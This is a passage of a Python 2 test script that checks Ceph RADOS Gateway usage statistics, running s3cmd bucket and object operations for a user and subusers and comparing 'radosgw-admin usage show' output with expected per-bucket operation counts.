"test2": {"categories": {"put_obj": {"ops": 1, "successful_ops": 1}}}}}
expect_dict9 = {"entries_size": 1,
"user1:subuser2": {"test2": {"categories": {"create_bucket": {"ops": 1, "successful_ops": 1}}}}}
os.chdir(ceph_path)
result1 = verify_show_based_on_version('radosgw-admin usage show --uid=user1', expect_dict7)
result2 = verify_show_based_on_version('radosgw-admin usage show --uid=user1 --subuser=subuser1', expect_dict8)
result3 = verify_show_based_on_version('radosgw-admin usage show --uid=user1 --subuser=subuser2', expect_dict9)
os.chdir(py_dir)
if result1 == result2 == result3 == True:
self.op4()
expect_dict10 = {"entries_size": 1,
"user1": {"test1": {"categories": {"create_bucket": {"ops": 1, "successful_ops": 1}}},
"test2": {"categories": {"create_bucket": {"ops": 1, "successful_ops": 1},
"put_obj": {"ops": 1, "successful_ops": 1}}},
"test3": {"categories": {"create_bucket": {"ops": 1, "successful_ops": 1},
"put_obj": {"ops": 1, "successful_ops": 1}}}}}
expect_dict11 = {"entries_size": 1,
"user1:subuser1": {"test1": {"categories": {"create_bucket": {"ops": 1, "successful_ops": 1}}},
"test2": {"categories": {"put_obj": {"ops": 1, "successful_ops": 1}}}}}
expect_dict12 = {"entries_size": 1,
"user1:subuser2": {"test2": {"categories": {"create_bucket": {"ops": 1, "successful_ops": 1}}}}}
os.chdir(ceph_path)
result1 = verify_show_based_on_version('radosgw-admin usage show --uid=user1', expect_dict10)
result2 = verify_show_based_on_version('radosgw-admin usage show --uid=user1 --subuser=subuser1', expect_dict11)
result3 = verify_show_based_on_version('radosgw-admin usage show --uid=user1 --subuser=subuser2', expect_dict12)
os.chdir(py_dir)
if result1 == result2 == result3 == True:
print "testcase5 %s" % (ok_display("OK"))
else:
print "testcase5 %s" % (fail_display("FAIL"))
else:
print "testcase5 %s" % (fail_display("FAIL"))
else:
print "testcase5 %s" % (fail_display("FAIL"))
else:
print "testcase5 %s" % (fail_display("FAIL"))
class TestCase6(object):
def op1(self):
exec_command('s3cmd -c user1.s3cfg get s3://test3/subuser1.s3cfg 6-1.txt')
time.sleep(30)
def op2(self):
exec_command('s3cmd -c subuser1.s3cfg get s3://test2/user1.s3cfg 6-2.txt')
exec_command('s3cmd -c subuser1.s3cfg get s3://test3/subuser1.s3cfg 6-3.txt')
time.sleep(30)
def op3(self):
exec_command('s3cmd -c subuser2.s3cfg get s3://test2/user1.s3cfg 6-4.txt')
exec_command('s3cmd -c subuser2.s3cfg get s3://test3/subuser1.s3cfg 6-5.txt')
time.sleep(30)
def run(self):
result1 = result2 = result3 = False
self.op1()
expect_dict1 = {"entries_size": 1,
"user1": {"test1": {"categories": {"create_bucket": {"ops": 1, "successful_ops": 1}}},
"test2": {"categories": {"create_bucket": {"ops": 1, "successful_ops": 1},
"put_obj": {"ops": 1, "successful_ops": 1}}},
"test3": {"categories": {"create_bucket": {"ops": 1, "successful_ops": 1},
"put_obj": {"ops": 1, "successful_ops": 1},
"get_obj": {"ops": 1, "successful_ops": 1}}}}}
expect_dict2 = {"entries_size": 1,
"user1:subuser1": {"test1": {"categories": {"create_bucket": {"ops": 1, "successful_ops": 1}}},
"test2": {"categories": {"put_obj": {"ops": 1, "successful_ops": 1}}}}}
expect_dict3 = {"entries_size": 1,
"user1:subuser2": {"test2": {"categories": {"create_bucket": {"ops": 1, "successful_ops": 1}}}}}
os.chdir(ceph_path)
result1 = verify_show_based_on_version('radosgw-admin usage show --uid=user1', expect_dict1)
result2 = verify_show_based_on_version('radosgw-admin usage show --uid=user1 --subuser=subuser1', expect_dict2)
result3 = verify_show_based_on_version('radosgw-admin usage show --uid=user1 --subuser=subuser2', expect_dict3)
os.chdir(py_dir)
if result1 == result2 == result3 == True:
self.op2()
expect_dict4 = {"entries_size": 1,
"user1": {"test1": {"categories": {"create_bucket": {"ops": 1, "successful_ops": 1}}},
"test2": {"categories": {"create_bucket": {"ops": 1, "successful_ops": 1},
"put_obj": {"ops": 1, "successful_ops": 1},
"get_obj": {"ops": 1, "successful_ops": 1}}},
"test3": {"categories": {"create_bucket": {"ops": 1, "successful_ops": 1},
"put_obj": {"ops": 1, "successful_ops": 1},
"get_obj": {"ops": 2, "successful_ops": 2}}}}}
expect_dict5 = {"entries_size": 1,
"user1:subuser1": {"test1": {"categories": {"create_bucket": {"ops": 1, "successful_ops": 1}}},
"test2": {"categories": {"put_obj": {"ops": 1, "successful_ops": 1},
"get_obj": {"ops": 1, "successful_ops": 1}}},
"test3": {"categories": {"get_obj": {"ops": 1, "successful_ops": 1}}}}}
expect_dict6 = {"entries_size": 1,
"user1:subuser2": {"test2": {"categories": {"create_bucket": {"ops": 1, "successful_ops": 1}}}}}
os.chdir(ceph_path)
result1 = verify_show_based_on_version('radosgw-admin usage show --uid=user1', expect_dict4)
result2 = verify_show_based_on_version('radosgw-admin usage show --uid=user1 --subuser=subuser1', expect_dict5)
result3 = verify_show_based_on_version('radosgw-admin usage show --uid=user1 --subuser=subuser2', expect_dict6)
os.chdir(py_dir)
if result1 == result2 == result3 == True:
self.op3()
expect_dict7 = {"entries_size": 1,
"user1": {"test1": {"categories": {"create_bucket": {"ops": 1, "successful_ops": 1}}},
"test2": {"categories": {"create_bucket": {"ops": 1, "successful_ops": 1},
"put_obj": {"ops": 1, "successful_ops": 1},
"get_obj": {"ops": 2, "successful_ops": 2}}},
"test3": {"categories": {"create_bucket": {"ops": 1, "successful_ops": 1},
"put_obj": {"ops": 1, "successful_ops": 1},
"get_obj": {"ops": 3, "successful_ops": 3}}}}}
expect_dict8 = {"entries_size": 1,
"user1:subuser1": {"test1": {"categories": {"create_bucket": {"ops": 1, "successful_ops": 1}}},
"test2": {"categories": {"put_obj": {"ops": 1, "successful_ops": 1},
"get_obj": {"ops": 1, "successful_ops": 1}}},
"test3": {"categories": {"get_obj": {"ops": 1, "successful_ops": 1}}}}}
expect_dict9 = {"entries_size": 1,
"user1:subuser2": {"test2": {"categories": {"create_bucket": {"ops": 1, "successful_ops": 1},
"get_obj": {"ops": 1, "successful_ops": 1}}},
"test3": {"categories": {"get_obj": {"ops": 1, "successful_ops": 1}}}}}
os.chdir(ceph_path)
result1 = verify_show_based_on_version('radosgw-admin usage show --uid=user1', expect_dict7)
result2 = verify_show_based_on_version('radosgw-admin usage show --uid=user1 --subuser=subuser1', expect_dict8)
result3 = verify_show_based_on_version('radosgw-admin usage show --uid=user1 --subuser=subuser2', expect_dict9)
os.chdir(py_dir)
if result1 == result2 == result3 == True:
print "testcase6 %s" % (ok_display("OK"))
else:
print "testcase6 %s" % (fail_display("FAIL"))
else:
print "testcase6 %s" % (fail_display("FAIL"))
else:
print "testcase6 %s" % (fail_display("FAIL"))
class TestCase7(object):
def op1(self):
exec_command('s3cmd -c user1.s3cfg ls s3://test1')
exec_command('s3cmd -c user1.s3cfg ls s3://test2')
exec_command('s3cmd -c user1.s3cfg ls s3://test3')
time.sleep(30)
def op2(self):
exec_command('s3cmd -c subuser1.s3cfg ls s3://test1')
exec_command('s3cmd -c subuser1.s3cfg ls s3://test2')
exec_command('s3cmd -c subuser1.s3cfg ls s3://test3')
time.sleep(30)
def op3(self):
exec_command('s3cmd -c subuser2.s3cfg ls s3://test1')
exec_command('s3cmd -c subuser2.s3cfg ls s3://test2')
exec_command('s3cmd -c subuser2.s3cfg ls s3://test3')
time.sleep(30)
def run(self):
result1 = result2 = result3 = False
self.op1()
expect_dict1 = {"entries_size": 1,
"user1": {"test1": {"categories": {"create_bucket": {"ops": 1, "successful_ops": 1},
"list_bucket": {"ops": 1, "successful_ops": 1}}},
"test2": {"categories": {"create_bucket": {"ops": 1, "successful_ops": 1},
"put_obj": {"ops": 1, "successful_ops": 1},
"get_obj": {"ops": 2, "successful_ops": 2},
"list_bucket": {"ops": 1, "successful_ops": 1}}},
"test3": {"categories": {"create_bucket": {"ops": 1, "successful_ops": 1},
"put_obj": {"ops": 1, "successful_ops": 1},
"get_obj": {"ops": 3, "successful_ops": 3},
"list_bucket": {"ops": 1, "successful_ops": 1}}}}}
expect_dict2 = {"entries_size": 1,
"user1:subuser1": {"test1": {"categories": {"create_bucket": {"ops": 1, "successful_ops": 1}}},
"test2": {"categories": {"put_obj": {"ops": 1, "successful_ops": 1},
"get_obj": {"ops": 1, "successful_ops": 1}}},
"test3": {"categories": {"get_obj": {"ops": 1, "successful_ops": 1}}}}}
expect_dict3 = {"entries_size": 1,
"user1:subuser2": {"test2": {"categories": {"create_bucket": {"ops": 1, "successful_ops": 1},
"get_obj": {"ops": 1, "successful_ops": 1}}},
"test3": {"categories": {"get_obj": {"ops": 1, "successful_ops": 1}}}}}
os.chdir(ceph_path)
result1 = verify_show_based_on_version('radosgw-admin usage show --uid=user1', expect_dict1)
result2 = verify_show_based_on_version('radosgw-admin usage show --uid=user1 --subuser=subuser1', expect_dict2)
result3 = verify_show_based_on_version('radosgw-admin usage show --uid=user1 --subuser=subuser2', expect_dict3)
os.chdir(py_dir)
if result1 == result2 == result3 == True:
self.op2()
expect_dict4 = {"entries_size": 1,
"user1": {"test1": {"categories": {"create_bucket": {"ops": 1, "successful_ops": 1},
"list_bucket": {"ops": 2, "successful_ops": 2}}},
"test2": {"categories": {"create_bucket": {"ops": 1, "successful_ops": 1},
"put_obj": {"ops": 1, "successful_ops": 1},
"get_obj": {"ops": 2, "successful_ops": 2},
"list_bucket": {"ops": 2, "successful_ops": 2}}},
"test3": {"categories": {"create_bucket": {"ops": 1, "successful_ops": 1},
"put_obj": {"ops": 1, "successful_ops": 1},
"get_obj": {"ops": 3, "successful_ops": 3},
"list_bucket": {"ops": 2, "successful_ops": 2}}}}}
expect_dict5 = {"entries_size": 1,
"user1:subuser1": {"test1": {"categories": {"create_bucket": {"ops": 1, "successful_ops": 1},
"list_bucket": {"ops": 1, "successful_ops": 1}}},
"test2": {"categories": {"put_obj": {"ops": 1, "successful_ops": 1},
"get_obj": {"ops": 1, "successful_ops": 1},
"list_bucket": {"ops": 1, "successful_ops": 1}}},
"test3": {"categories": {"get_obj": {"ops": 1, "successful_ops": 1},
"list_bucket": {"ops": 1, "successful_ops": 1}}}}}
expect_dict6 = {"entries_size": 1,
"user1:subuser2": {"test2": {"categories": {"create_bucket": {"ops": 1, "successful_ops": 1},
"get_obj": {"ops": 1, "successful_ops": 1}}},
"test3": {"categories": {"get_obj": {"ops": 1, "successful_ops": 1}}}}}
os.chdir(ceph_path)
result1 = verify_show_based_on_version('radosgw-admin usage show --uid=user1', expect_dict4)
result2 = verify_show_based_on_version('radosgw-admin usage show --uid=user1 --subuser=subuser1', expect_dict5)
result3 = verify_show_based_on_version('radosgw-admin usage show --uid=user1 --subuser=subuser2', expect_dict6)
os.chdir(py_dir)
if result1 == result2 == result3 == True:
self.op3()
expect_dict7 = {"entries_size": 1,
"user1": {"test1": {"categories": {"create_bucket": {"ops": 1, "successful_ops": 1},
"list_bucket": {"ops": 3, "successful_ops": 3}}},
"test2": {"categories": {"create_bucket": {"ops": 1, "successful_ops": 1},
"put_obj": {"ops": 1, "successful_ops": 1},
"get_obj": {"ops": 2, "successful_ops": 2},
"list_bucket": {"ops": 3, "successful_ops": 3}}},
"test3": {"categories": {"create_bucket": {"ops": 1, "successful_ops": 1},
"put_obj": {"ops": 1, "successful_ops": 1},
"get_obj": {"ops": 3, "successful_ops": 3},
"list_bucket": {"ops": 3, "successful_ops": 3}}}}}
expect_dict8 = {"entries_size": 1,
"user1:subuser1": {"test1": {"categories": {"create_bucket": {"ops": 1, "successful_ops": 1},
"list_bucket": {"ops": 1, "successful_ops": 1}}},
"test2": {"categories": {"put_obj": {"ops": 1, "successful_ops": 1},
"get_obj": {"ops": 1, "successful_ops": 1},
"list_bucket": {"ops": 1, "successful_ops": 1}}},
"test3": {"categories": {"get_obj": {"ops": 1, "successful_ops": 1},
"list_bucket": {"ops": 1, "successful_ops": 1}}}}}
expect_dict9 = {"entries_size": 1,
"user1:subuser2": {"test1": {"categories": {"list_bucket": {"ops": 1, "successful_ops": 1}}},
"test2": {"categories": {"create_bucket": {"ops": 1, "successful_ops": 1},
"get_obj": {"ops": 1, "successful_ops": 1},
"list_bucket": {"ops": 1, "successful_ops": 1}}},
"test3": {"categories": {"get_obj": {"ops": 1, "successful_ops": 1},
"list_bucket": {"ops": 1, "successful_ops": 1}}}}}
os.chdir(ceph_path)
result1 = verify_show_based_on_version('radosgw-admin usage show --uid=user1', expect_dict7)
result2 = verify_show_based_on_version('radosgw-admin usage show --uid=user1 --subuser=subuser1', expect_dict8)
result3 = verify_show_based_on_version('radosgw-admin usage show --uid=user1 --subuser=subuser2', expect_dict9)
os.chdir(py_dir)
if result1 == result2 == result3 == True:
print "testcase7 %s" % (ok_display("OK"))
else:
print "testcase7 %s" % (fail_display("FAIL"))
else:
print "testcase7 %s" % (fail_display("FAIL"))
else:
print "testcase7 %s" % (fail_display("FAIL"))
class TestCase8(object):
def op1(self):
exec_command('s3cmd -c user1.s3cfg del s3://test3/subuser1.s3cfg')
time.sleep(30)
def op2(self):
exec_command('s3cmd -c subuser1.s3cfg del s3://test2/user1.s3cfg')
time.sleep(30)
def op3(self):
exec_command('s3cmd -c subuser2.s3cfg rb s3://test2')
time.sleep(30)
def op4(self):
exec_command('s3cmd -c subuser1.s3cfg rb s3://test1')
time.sleep(30)
def op5(self):
exec_command('s3cmd -c user1.s3cfg rb s3://test3')
time.sleep(30)
def run(self):
result1 = result2 = result3 = False
self.op1()
expect_dict1 = {"entries_size": 1,
"user1": {"test1": {"categories": {"create_bucket": {"ops": 1, "successful_ops": 1},
"list_bucket": {"ops": 3, "successful_ops": 3}}},
"test2": {"categories": {"create_bucket": {"ops": 1, "successful_ops": 1},
"put_obj": {"ops": 1, "successful_ops": 1},
"get_obj": {"ops": 2, "successful_ops": 2},
"list_bucket": {"ops": 3, "successful_ops": 3}}},
"test3": {"categories": {"create_bucket": {"ops": 1, "successful_ops": 1},
"put_obj": {"ops": 1, "successful_ops": 1},
"get_obj": {"ops": 3, "successful_ops": 3},
"list_bucket": {"ops": 3, "successful_ops": 3},
"delete_obj": {"ops": 1, "successful_ops": 1}}}}}
expect_dict2 = {"entries_size": 1,
"user1:subuser1": {"test1": {"categories": {"create_bucket": {"ops": 1, "successful_ops": 1},
"list_bucket": {"ops": 1, "successful_ops": 1}}},
"test2": {"categories": {"put_obj": {"ops": 1, "successful_ops": 1},
"get_obj": {"ops": 1, "successful_ops": 1},
"list_bucket": {"ops": 1, "successful_ops": 1}}},
"test3": {"categories": {"get_obj": {"ops": 1, "successful_ops": 1},
"list_bucket": {"ops": 1, "successful_ops": 1}}}}}
expect_dict3 = {"entries_size": 1,
"user1:subuser2": {"test1": {"categories": {"list_bucket": {"ops": 1, "successful_ops": 1}}},
"test2": {"categories": {"create_bucket": {"ops": 1, "successful_ops": 1},
"get_obj": {"ops": 1, "successful_ops": 1},
"list_bucket": {"ops": 1, "successful_ops": 1}}},
"test3": {"categories": {"get_obj": {"ops": 1, "successful_ops": 1},
"list_bucket": {"ops": 1, "successful_ops": 1}}}}}
os.chdir(ceph_path)
result1 = verify_show_based_on_version('radosgw-admin usage show --uid=user1', expect_dict1)
result2 = verify_show_based_on_version('radosgw-admin usage show --uid=user1 --subuser=subuser1', expect_dict2)
result3 = verify_show_based_on_version('radosgw-admin usage show --uid=user1 --subuser=subuser2', expect_dict3)
os.chdir(py_dir)
if result1 == result2 == result3 == True:
self.op2()
expect_dict4 = {"entries_size": 1,
"user1": {"test1": {"categories": {"create_bucket": {"ops": 1, "successful_ops": 1},
"list_bucket": {"ops": 3, "successful_ops": 3}}},
"test2": {"categories": {"create_bucket": {"ops": 1, "successful_ops": 1},
"put_obj": {"ops": 1, "successful_ops": 1},
"get_obj": {"ops": 2, "successful_ops": 2},
"list_bucket": {"ops": 3, "successful_ops": 3},
"delete_obj": {"ops": 1, "successful_ops": 1}}},
"test3": {"categories": {"create_bucket": {"ops": 1, "successful_ops": 1},
"put_obj": {"ops": 1, "successful_ops": 1},
"get_obj": {"ops": 3, "successful_ops": 3},
"list_bucket": {"ops": 3, "successful_ops": 3},
"delete_obj": {"ops": 1, "successful_ops": 1}}}}}
expect_dict5 = {"entries_size": 1,
"user1:subuser1": {"test1": {"categories": {"create_bucket": {"ops": 1, "successful_ops": 1},
"list_bucket": {"ops": 1, "successful_ops": 1}}},
"test2": {"categories": {"put_obj": {"ops": 1, "successful_ops": 1},
"get_obj": {"ops": 1, "successful_ops": 1},
"list_bucket": {"ops": 1, "successful_ops": 1},
"delete_obj": {"ops": 1, "successful_ops": 1}}},
"test3": {"categories": {"get_obj": {"ops": 1, "successful_ops": 1},
"list_bucket": {"ops": 1, "successful_ops": 1}}}}}
expect_dict6 = {"entries_size": 1,
"user1:subuser2": {"test1": {"categories": {"list_bucket": {"ops": 1, "successful_ops": 1}}},
"test2": {"categories": {"create_bucket": {"ops": 1, "successful_ops": 1},
"get_obj": {"ops": 1, "successful_ops": 1},
"list_bucket": {"ops": 1, "successful_ops": 1}}},
"test3": {"categories": {"get_obj": {"ops": 1, "successful_ops": 1},
"list_bucket": {"ops": 1, "successful_ops": 1}}}}}
os.chdir(ceph_path)
result1 = verify_show_based_on_version('radosgw-admin usage show --uid=user1', expect_dict4)
result2 = verify_show_based_on_version('radosgw-admin usage show --uid=user1 --subuser=subuser1', expect_dict5)
result3 = verify_show_based_on_version('radosgw-admin usage show --uid=user1 --subuser=subuser2', expect_dict6)
os.chdir(py_dir)
if result1 == result2 == result3 == True:
self.op3()
expect_dict7 = {"entries_size": 1,
"user1": {"test1": {"categories": {"create_bucket": {"ops": 1, "successful_ops": 1},
"list_bucket": {"ops": 3, "successful_ops": 3}}},
"test2": {"categories": {"create_bucket": {"ops": 1, "successful_ops": 1},
"put_obj": {"ops": 1, "successful_ops": 1},
"get_obj": {"ops": 2, "successful_ops": 2},
"list_bucket": {"ops": 3, "successful_ops": 3},
"delete_obj": {"ops": 1, "successful_ops": 1},
"delete_bucket": {"ops": 1, "successful_ops": 1}}},
"test3": {"categories": {"create_bucket": {"ops": 1, "successful_ops": 1},
"put_obj": {"ops": 1, "successful_ops": 1},
"get_obj": {"ops": 3, "successful_ops": 3},
"list_bucket": {"ops": 3, "successful_ops": 3},
"delete_obj": {"ops": 1, "successful_ops": 1}}}}}
expect_dict8 = {"entries_size": 1,
"user1:subuser1": {"test1": {"categories": {"create_bucket": {"ops": 1, "successful_ops": 1},
"list_bucket": {"ops": 1, "successful_ops": 1}}},
"test2": {"categories": {"put_obj": {"ops": 1, "successful_ops": 1},
"get_obj": {"ops": 1, "successful_ops": 1},
"list_bucket": {"ops": 1, "successful_ops": 1},
"delete_obj": {"ops": 1, "successful_ops": 1}}},
"test3": {"categories": {"get_obj": {"ops": 1, "successful_ops": 1},
"list_bucket": {"ops": 1, "successful_ops": 1}}}}}
expect_dict9 = {"entries_size": 1,
"user1:subuser2": {"test1": {"categories": {"list_bucket": {"ops": 1, "successful_ops": 1}}},
"test2": {"categories": {"create_bucket": {"ops": 1, "successful_ops": 1},
"get_obj": {"ops": 1, "successful_ops": 1},
"list_bucket": {"ops": 1, "successful_ops": 1},
"delete_bucket": {"ops": 1, "successful_ops": 1}}},
"test3": {"categories": {"get_obj": {"ops": 1, "successful_ops": 1},
"list_bucket": {"ops": 1, "successful_ops": 1}}}}}
os.chdir(ceph_path)
result1 = verify_show_based_on_version('radosgw-admin usage show --uid=user1', expect_dict7)
result2 = verify_show_based_on_version('radosgw-admin usage show --uid=user1 --subuser=subuser1', expect_dict8)
result3 = verify_show_based_on_version('radosgw-admin usage show --uid=user1 --subuser=subuser2', expect_dict9)
os.chdir(py_dir)
if result1 == result2 == result3 == True:
self.op4()
expect_dict10 = {"entries_size": 1,
"user1": {"test1": {"categories": {"create_bucket": {"ops": 1, "successful_ops": 1},
"list_bucket": {"ops": 3, "successful_ops": 3},
"delete_bucket": {"ops": 1, "successful_ops": 1}}},
"test2": {"categories": {"create_bucket": {"ops": 1, "successful_ops": 1},
"put_obj": {"ops": 1, "successful_ops": 1},
"get_obj": {"ops": 2, "successful_ops": 2},
"list_bucket": {"ops": 3, "successful_ops": 3},
"delete_obj": {"ops": 1, "successful_ops": 1},
"delete_bucket": {"ops": 1, "successful_ops": 1}}},
"test3": {"categories": {"create_bucket": {"ops": 1, "successful_ops": 1},
"put_obj": {"ops": 1, "successful_ops": 1},
"get_obj": {"ops": 3, "successful_ops": 3},
"list_bucket": {"ops": 3, "successful_ops": 3},
"delete_obj": {"ops": 1, "successful_ops": 1}}}}}
expect_dict11 = {"entries_size": 1,
"user1:subuser1": {"test1": {"categories": {"create_bucket": {"ops": 1, "successful_ops": 1},
"list_bucket": {"ops": 1, "successful_ops": 1},
"delete_bucket": {"ops": 1, "successful_ops": 1}}},
"test2": {"categories": {"put_obj": {"ops": 1, "successful_ops": 1},
"get_obj": {"ops": 1, "successful_ops": 1},
"list_bucket": {"ops": 1, "successful_ops": 1},
"delete_obj": {"ops": 1, "successful_ops": 1}}},
"test3": {"categories": {"get_obj": {"ops": 1, "successful_ops": 1},
"list_bucket": {"ops": 1, "successful_ops": 1}}}}}
expect_dict12 = {"entries_size": 1,
"user1:subuser2": {"test1": {"categories": {"list_bucket": {"ops": 1, "successful_ops": 1}}},
"test2": {"categories": {"create_bucket": {"ops": 1, "successful_ops": 1},
"get_obj": {"ops": 1, "successful_ops": 1},
"list_bucket": {"ops": 1, "successful_ops": 1},
"delete_bucket": {"ops": 1, "successful_ops": 1}}},
"test3": {"categories": {"get_obj": {"ops": 1, "successful_ops": 1},
"list_bucket": {"ops": 1, "successful_ops": 1}}}}}
os.chdir(ceph_path)
result1 = verify_show_based_on_version('radosgw-admin usage show --uid=user1', expect_dict10)
result2 = verify_show_based_on_version('radosgw-admin usage show --uid=user1 --subuser=subuser1', expect_dict11)
result3 = verify_show_based_on_version('radosgw-admin usage show --uid=user1 --subuser=subuser2', expect_dict12)
os.chdir(py_dir)
if result1 == result2 == result3 == True:
self.op5()
expect_dict13 = {"entries_size": 1,
"user1": {"test1": {"categories": {"create_bucket": {"ops": 1, "successful_ops": 1},
"list_bucket": {"ops": 3, "successful_ops": 3},
"delete_bucket": {"ops": 1, "successful_ops": 1}}},
"test2": {"categories": {"create_bucket": {"ops": 1, "successful_ops": 1},
"put_obj": {"ops": 1, "successful_ops": 1},
"get_obj": {"ops": 2, "successful_ops": 2},
"list_bucket": {"ops": 3, "successful_ops": 3},
"delete_obj": {"ops": 1, "successful_ops": 1},
"delete_bucket": {"ops": 1, "successful_ops": 1}}},
"test3": {"categories": {"create_bucket": {"ops": 1, "successful_ops": 1},
"put_obj": {"ops": 1, "successful_ops": 1},
"get_obj": {"ops": 3, "successful_ops": 3},
"list_bucket": {"ops": 3, "successful_ops": 3},
"delete_obj": {"ops": 1, "successful_ops": 1},
"delete_bucket": {"ops": 1, "successful_ops": 1}}}}}
expect_dict14 = {"entries_size": 1,
"user1:subuser1": {"test1": {"categories": {"create_bucket": {"ops": 1, "successful_ops": 1},
"list_bucket": {"ops": 1, "successful_ops": 1},
"delete_bucket": {"ops": 1, "successful_ops": 1}}},
"test2": {"categories": {"put_obj": {"ops": 1, "successful_ops": 1},
"get_obj": {"ops": 1, "successful_ops": 1},
"list_bucket": {"ops": 1, "successful_ops": 1},
"delete_obj": {"ops": 1, "successful_ops": 1}}},
"test3": {"categories": {"get_obj": {"ops": 1, "successful_ops": 1},
"list_bucket": {"ops": 1, "successful_ops": 1}}}}}
expect_dict15 = {"entries_size": 1,
"user1:subuser2": {"test1": {"categories": {"list_bucket": {"ops": 1, "successful_ops": 1}}},
"test2": {"categories": {"create_bucket": {"ops": 1, "successful_ops": 1},
"get_obj": {"ops": 1, "successful_ops": 1},
"list_bucket": {"ops": 1, "successful_ops": 1},
"delete_bucket": {"ops": 1, "successful_ops": 1}}},
"test3": {"categories": {"get_obj": {"ops": 1, "successful_ops": 1},
"list_bucket": {"ops": 1, "successful_ops": 1}}}}}
os.chdir(ceph_path)
result1 = verify_show_based_on_version('radosgw-admin usage show --uid=user1', expect_dict13)
result2 = verify_show_based_on_version('radosgw-admin usage show --uid=user1 --subuser=subuser1', expect_dict14)
result3 = verify_show_based_on_version('radosgw-admin usage show --uid=user1 --subuser=subuser2', expect_dict15)
os.chdir(py_dir)
if result1 == result2 == result3 == True:
print "testcase8 %s" % (ok_display("OK"))
else:
print "testcase8 %s" % (fail_display("FAIL"))
else:
print "testcase8 %s" % (fail_display("FAIL"))
else:
print "testcase8 %s" % (fail_display("FAIL"))
else:
print "testcase8 %s" % (fail_display("FAIL"))
else:
print "testcase8 %s" % (fail_display("FAIL"))
self.clean()
def clean(self):
os.chdir(ceph_path)
exec_based_on_version('radosgw-admin usage trim --uid=user1')
exec_based_on_version('radosgw-admin user rm --uid=user1 --purge-data --purge-keys')
os.chdir(py_dir)
exec_command('rm 6*.txt')
class TestCase9(object):
def prepare(self):
os.chdir(ceph_path)
exec_based_on_version('radosgw-admin user create --uid=user1 --access-key=user1 --secret-key=user1 --display-name="user1"')
exec_based_on_version('radosgw-admin subuser create --key-type=s3 --uid=user1 --subuser=subuser1 --access=full --access-key=subuser1 --secret-key=subuser1')
os.chdir(py_dir)
def op1(self):
exec_command('s3cmd -c user1.s3cfg mb s3://test1')
time.sleep(30)
def op2(self):
exec_command('s3cmd -c subuser1.s3cfg mb s3://test2')
time.sleep(30)
def op3(self):
exec_command('s3cmd -c user1.s3cfg put user1.s3cfg s3://test2')
time.sleep(30)
def op4(self):
exec_command('s3cmd -c subuser1.s3cfg put subuser1.s3cfg s3://test1')
time.sleep(30)
def op5(self):
exec_command('s3cmd -c subuser1.s3cfg put subuser2.s3cfg s3://test2')
time.sleep(30)
def run(self):
result1 = result2 = False
self.prepare()
self.op1()
expect_dict1 = {"entries_size": 1,
"user1": {"test1": {"categories": {"create_bucket": {"ops": 1, "successful_ops": 1}}}}}
expect_dict2 = {"entries_size": 0}
os.chdir(ceph_path)
result1 = verify_show_based_on_version('radosgw-admin usage show --uid=user1', expect_dict1)
result2 = verify_show_based_on_version('radosgw-admin usage show --uid=user1 --subuser=subuser1', expect_dict2)
os.chdir(py_dir)
if result1 == result2 == True:
self.op2()
expect_dict3 = {"entries_size": 1,
"user1": {"test1": {"categories": {"create_bucket": {"ops": 1, "successful_ops": 1}}},
"test2": {"categories": {"create_bucket": {"ops": 1, "successful_ops": 1}}}}}
expect_dict4 = {"entries_size": 1,
"user1:subuser1": {"test2": {"categories": {"create_bucket": {"ops": 1, "successful_ops": 1}}}}}
os.chdir(ceph_path)
result1 = verify_show_based_on_version('radosgw-admin usage show --uid=user1', expect_dict3)
result2 = verify_show_based_on_version('radosgw-admin usage show --uid=user1 --subuser=subuser1', expect_dict4)
os.chdir(py_dir)
if result1 == result2 == True:
self.op3()
expect_dict5 = {"entries_size": 1,
"user1": {"test1": {"categories": {"create_bucket": {"ops": 1, "successful_ops": 1}}},
"test2": {"categories": {"create_bucket": {"ops": 1, "successful_ops": 1},
"put_obj": {"ops": 1, "successful_ops": 1}}}}}
expect_dict6 = {"entries_size": 1,
"user1:subuser1": {"test2": {"categories": {"create_bucket": {"ops": 1, "successful_ops": 1}}}}}
os.chdir(ceph_path)
result1 = verify_show_based_on_version('radosgw-admin usage show --uid=user1', expect_dict5)
result2 = verify_show_based_on_version('radosgw-admin usage show --uid=user1 --subuser=subuser1', expect_dict6)
os.chdir(py_dir)
if result1 == result2 == True:
self.op4()
expect_dict7 = {"entries_size": 1,
"user1": {"test1": {"categories": {"create_bucket": {"ops": 1, "successful_ops": 1},
"put_obj": {"ops": 1, "successful_ops": 1}}},
"test2": {"categories": {"create_bucket": {"ops": 1, "successful_ops": 1},
"put_obj": {"ops": 1, "successful_ops": 1}}}}}
expect_dict8 = {"entries_size": 1,
"user1:subuser1": {"test1": {"categories": {"put_obj": {"ops": 1, "successful_ops": 1}}},
"test2": {"categories": {"create_bucket": {"ops": 1, "successful_ops": 1}}}}}
os.chdir(ceph_path)
result1 = verify_show_based_on_version('radosgw-admin usage show --uid=user1', expect_dict7)
result2 = verify_show_based_on_version('radosgw-admin usage show --uid=user1 --subuser=subuser1', expect_dict8)
os.chdir(py_dir)
if result1 == result2 == True:
self.op5()
expect_dict9 = {"entries_size": 1,
"user1": {"test1": {"categories": {"create_bucket": {"ops": 1, "successful_ops": 1},
"put_obj": {"ops": 1, "successful_ops": 1}}},
"test2": {"categories": {"create_bucket": {"ops": 1, "successful_ops": 1},
"put_obj": {"ops": 2, "successful_ops": 2}}}}}
expect_dict10 = {"entries_size": 1,
"user1:subuser1": {"test1": {"categories": {"put_obj": {"ops": 1, "successful_ops": 1}}},
"test2": {"categories": {"create_bucket": {"ops": 1, "successful_ops": 1},
"put_obj": {"ops": 1, "successful_ops": 1}}}}}
os.chdir(ceph_path)
result1 = verify_show_based_on_version('radosgw-admin usage show --uid=user1', expect_dict9)
result2 = verify_show_based_on_version('radosgw-admin usage show --uid=user1 --subuser=subuser1', expect_dict10)
os.chdir(py_dir)
if result1 == result2 == True:
print "testcase9 %s" % (ok_display("OK"))
else:
print "testcase9 %s" % (fail_display("FAIL"))
else:
print "testcase9 %s" % (fail_display("FAIL"))
else:
print "testcase9 %s" % (fail_display("FAIL"))
else:
print "testcase9 %s" % (fail_display("FAIL"))
else:
print "testcase9 %s" % (fail_display("FAIL"))
class TestCase10(object):
def op1(self):
exec_command('s3cmd -c user1.s3cfg get s3://test2/subuser2.s3cfg 10-1.txt')
time.sleep(30)
def op2(self):
exec_command('s3cmd -c subuser1.s3cfg get s3://test2/user1.s3cfg 10-2.txt')
exec_command('s3cmd -c subuser1.s3cfg get s3://test1/subuser1.s3cfg 10-3.txt')
exec_command('s3cmd -c subuser1.s3cfg get s3://test2/subuser2.s3cfg 10-4.txt')
